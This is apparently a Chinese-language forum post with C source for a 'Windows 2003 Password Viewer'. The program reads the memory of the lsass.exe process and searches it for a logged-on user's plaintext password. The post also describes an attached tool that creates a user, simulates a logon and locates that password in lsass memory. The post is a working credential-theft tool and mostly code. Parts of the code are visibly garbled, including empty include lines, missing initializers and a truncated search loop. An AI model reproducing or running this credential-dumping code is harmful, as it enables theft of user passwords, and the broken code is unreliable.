下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote
Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。
代码:
//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The
Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include
#include
#include
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The
Password May Be Located Before The Address Or Far More From This Address,Which
Causes The Result Unreliable
char Password[MAX_PATH] = ; // Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer
V1.0 By WinEggDrop\n\n");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program
Can't Only Run On Windows 2003 Platform\n");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return
Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To
Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
//
Note: The Program Tries To Locate The Magic String "LocalSystem Remote
Procedure",
// Since The Password Is Near The Above Location,But It's Not
Always True That
// We Will Find The Magic String,Or Even We Find It,The
Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i 0)
{
Password[Count++] =
Buffer[j];
}
else
{
break;
}
}
return i + 7; // One
Flag To Indicate We Find The Password
}
}
}
return -1; //
Well,We Fail To Find The Password,And This Always Happens
}
// End
Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
//
Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess =
NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(
hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap
Shot\n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return
0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID =
pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap,
&pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
//
Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char
Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if
(hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 *
1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To
Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0)
// We May Find The Password
{
if (strlen(Password) > 0) // Yes,We
Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found +
BaseAddress,Password);
}
}
else
{
printf("Fail To Find The
Password\n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return
(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End
Is2003()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
2.Locator 用户名 密码 ->
在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。
